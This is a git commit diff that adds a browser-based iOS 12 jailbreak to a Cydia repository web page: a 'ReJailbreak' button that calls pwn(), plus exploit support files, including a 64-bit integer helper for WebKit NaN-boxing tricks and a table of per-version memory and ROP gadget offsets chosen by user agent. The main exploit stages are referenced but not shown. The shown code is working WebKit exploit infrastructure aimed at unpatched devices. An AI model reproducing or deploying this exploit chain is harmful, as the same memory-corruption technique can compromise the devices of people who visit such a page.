.

Signed-off-by: dopaemon <polarisdp@gmail.com>

Author: dopaemon

helper.js

@@ -0,0 +1,3 @@
+function log(msg) {
+    ;
+}

index.html

@@ -1,10 +1,26 @@
 <!DOCTYPE html>
 <html><head>
     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
-        <meta charset="UTF-8">
-            <title>Cydia Block Repository</title>
-            <link rel="stylesheet" type="text/css" href="style-3163da6b7950852a03d31ea77735f4e1d2ba6699.css"/>
-            <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0">
+    <meta charset="UTF-8">
+    <title>Cydia Block Repository</title>
+    <link rel="stylesheet" type="text/css" href="style-3163da6b7950852a03d31ea77735f4e1d2ba6699.css"/>
+    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0">
+
+    <script type="text/javascript" src="utils.js"></script>
+    <script type="text/javascript" src="int64.js"></script>
+    <script type="text/javascript" src="stages.js"></script>
+    <script type="text/javascript" src="offsets.js"></script>
+    <script type="text/javascript" src="pwn.js"></script>
+    <script>
+        function log(msg) {};
+        function rejb() {
+            document.getElementById("jbButton").textContent = "re-jailbreaking";
+
+            setTimeout(() => {
+              pwn();
+            }, 100);
+        }
+    </script>
 </head>
     <body class="pinstripe">
         <panel>
@@ -20,6 +36,16 @@
                     </div>
                 </div>
             </fieldset>
+            <label>Jailbreak</label>
+            <fieldset style="background-color: #ccf">
+                <a id="jbButton" onclick="rejb();">
+                    <div>
+                        <div>
+                            ReJailbreak iOS 12 -> 12.5.7 Jailbreak with Chimera
+                        </div>
+                    </div>
+                </a>
+            </fieldset>
             <label>Disclaimer</label>
             <fieldset style="background-color: #fcc">
                 <div>

int64.js

@@ -0,0 +1,212 @@
+//
+// Tiny module that provides big (64bit) integers.
+//
+// Copyright (c) 2016 Samuel Groß
+//
+// Requires utils.js
+//
+
+// Datatype to represent 64-bit integers.
+//
+// Internally, the integer is stored as a Uint8Array in little endian byte order.
+function Int64(v) {
+    // The underlying byte array.
+    var bytes = new Uint8Array(8);
+
+    switch (typeof v) {
+        case 'number':
+            v = '0x' + Math.floor(v).toString(16);
+        case 'string':
+            if (v.startsWith('0x'))
+                v = v.substr(2);
+            if (v.length % 2 == 1)
+                v = '0' + v;
+
+            var bigEndian = unhexlify(v, 8);
+            bytes.set(Array.from(bigEndian).reverse());
+            break;
+        case 'object':
+            if (v instanceof Int64) {
+                bytes.set(v.bytes());
+            } else {
+                if (v.length != 8)
+                    throw TypeError("Array must have excactly 8 elements.");
+                bytes.set(v);
+            }
+            break;
+        case 'undefined':
+            break;
+        default:
+            throw TypeError("Int64 constructor requires an argument.");
+    }
+
+    // Return a double whith the same underlying bit representation.
+    this.asDouble = function() {
+        // Check for NaN
+        if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
+            throw new RangeError("Integer can not be represented by a double");
+
+        return Struct.unpack(Struct.float64, bytes);
+    };
+
+    // Return a javascript value with the same underlying bit representation.
+    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
+    // due to double conversion constraints.
+    this.asJSValue = function() {
+        if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
+            throw new RangeError("Integer can not be represented by a JSValue");
+
+        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
+        this.assignSub(this, 0x1000000000000);
+        var res = Struct.unpack(Struct.float64, bytes);
+        this.assignAdd(this, 0x1000000000000);
+
+        return res;
+    };
+
+    // Return the underlying bytes of this number as array.
+    this.bytes = function() {
+        return Array.from(bytes);
+    };
+
+    // Return the byte at the given index.
+    this.byteAt = function(i) {
+        return bytes[i];
+    };
+
+    // Return the value of this number as unsigned hex string.
+    this.toString = function() {
+        return '0x' + hexlify(Array.from(bytes).reverse());
+    };
+
+    this.lo = function()
+    {
+        var b = this.bytes();
+        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+    };
+
+    this.hi = function()
+    {
+        var b = this.bytes();
+        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
+    };
+
+    // Basic arithmetic.
+    // These functions assign the result of the computation to their 'this' object.
+
+    // Decorator for Int64 instance operations. Takes care
+    // of converting arguments to Int64 instances if required.
+    function operation(f, nargs) {
+        return function() {
+            if (arguments.length != nargs)
+                throw Error("Not enough arguments for function " + f.name);
+            for (var i = 0; i < arguments.length; i++)
+                if (!(arguments[i] instanceof Int64))
+                    arguments[i] = new Int64(arguments[i]);
+            return f.apply(this, arguments);
+        };
+    }
+
+    // this = -n (two's complement)
+    this.assignNeg = operation(function neg(n) {
+        for (var i = 0; i < 8; i++)
+            bytes[i] = ~n.byteAt(i);
+
+        return this.assignAdd(this, Int64.One);
+    }, 1);
+
+    // this = a + b
+    this.assignAdd = operation(function add(a, b) {
+        var carry = 0;
+        for (var i = 0; i < 8; i++) {
+            var cur = a.byteAt(i) + b.byteAt(i) + carry;
+            carry = cur > 0xff | 0;
+            bytes[i] = cur;
+        }
+        return this;
+    }, 2);
+
+    // this = a - b
+    this.assignSub = operation(function sub(a, b) {
+        var carry = 0;
+        for (var i = 0; i < 8; i++) {
+            var cur = a.byteAt(i) - b.byteAt(i) - carry;
+            carry = cur < 0 | 0;
+            bytes[i] = cur;
+        }
+        return this;
+    }, 2);
+}
+
+// Constructs a new Int64 instance with the same bit representation as the provided double.
+Int64.fromDouble = function(d) {
+    var bytes = Struct.pack(Struct.float64, d);
+    return new Int64(bytes);
+};
+
+// Convenience functions. These allocate a new Int64 to hold the result.
+
+// Return -n (two's complement)
+function Neg(n) {
+    return (new Int64()).assignNeg(n);
+}
+
+// Return a + b
+function Add(a, b) {
+    return (new Int64()).assignAdd(a, b);
+}
+
+// Return a - b
+function Sub(a, b) {
+    return (new Int64()).assignSub(a, b);
+}
+
+// Return a & b
+function And(a, b) {
+    return (new Int64()).assignAnd(a, b);
+}
+
+// Return a << 1
+function LShift1(a) {
+    return (new Int64()).assignLShift1(a);
+}
+
+// Return a >> 1
+function RShift1(a) {
+    return (new Int64()).assignRShift1(a);
+}
+
+// Return a << b
+function ShiftLeft(a, b) {
+    return (new Int64()).assignShiftLeft(a, b);
+}
+
+// Return a >> b
+function ShiftRight(a, b) {
+    return (new Int64()).assignShiftRight(a, b);
+}
+
+// Return a == b
+function Eq(a, b) {
+    if(!(a instanceof Int64)) {
+        a = new Int64(a);
+    }
+
+    if(!(b instanceof Int64)) {
+        b = new Int64(b);
+    }
+
+    for(let Idx = 0; Idx < 8; Idx++) {
+        if(a.byteAt(Idx) != b.byteAt(Idx)) {
+            return false;
+        }
+    }
+
+    return true;
+}
+
+// Some commonly used numbers.
+Int64.Zero = new Int64(0);
+Int64.One = new Int64(1);
+
+// That's all the arithmetic we need for exploiting WebKit.. :)

offsets.js

@@ -0,0 +1,49 @@
+const offsets_obj = {
+
+    memPoolStart: undefined,
+    memPoolEnd: undefined,
+    cookieAddr: undefined,
+    webcore_libcpp_ref_gadget_off: undefined,
+    airplay_dispatch_ref_gadget_off: undefined,
+
+    resolve() {
+        // Mozilla/5.0 (iPhone; CPU iPhone OS 12_5_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1
+        if (navigator.userAgent.match(/OS 12_5(_\d+)?/) || navigator.userAgent.match(/OS 12_4(_\d+)?/) || navigator.userAgent.match(/OS 12_3(_\d+)?/) || navigator.userAgent.match(/OS 12_2(_\d+)?/)) {
+            log("[i] offsets selected for iOS 12.2+");
+
+            this.memPoolStart = 0xC8;
+            this.memPoolEnd = 0xD0;
+            this.cookieAddr = (0x8ECA0 + 0x38);
+            this.webcore_libcpp_ref_gadget_off = 0x94c00;
+            this.airplay_dispatch_ref_gadget_off = 0x2000;
+        }
+        else if (navigator.userAgent.match(/OS 12_1(_\d+)?/)) {
+            log("[i] offsets selected for iOS 12.1+");
+            this.memPoolStart = 0;
+            this.memPoolEnd = 0;
+            this.cookieAddr = (0x9AC60 + 0x38);
+            this.webcore_libcpp_ref_gadget_off = 0x9d000;
+            this.airplay_dispatch_ref_gadget_off = 0x29000;
+        }
+         else if (navigator.userAgent.match(/OS 12_0(_\d+)?/)) {
+            log("[i] offsets selected for iOS 12.0+");
+            this.memPoolStart = 0;
+            this.memPoolEnd = 0;
+            this.cookieAddr = (0x9AC60 + 0x38);
+            this.webcore_libcpp_ref_gadget_off = 0x9e000;
+            this.airplay_dispatch_ref_gadget_off = 0x29000;
+        }
+        else {
+            throw "Unknown platform: " + navigator.userAgent;
+        }
+    }
+};
+
+const offsets = new Proxy(offsets_obj, {
+    get(target, property) {
+        if (target[property] === undefined) {
+            throw `Using undefined offset ${property}`;
+        }
+        return target[property];
+    }
+});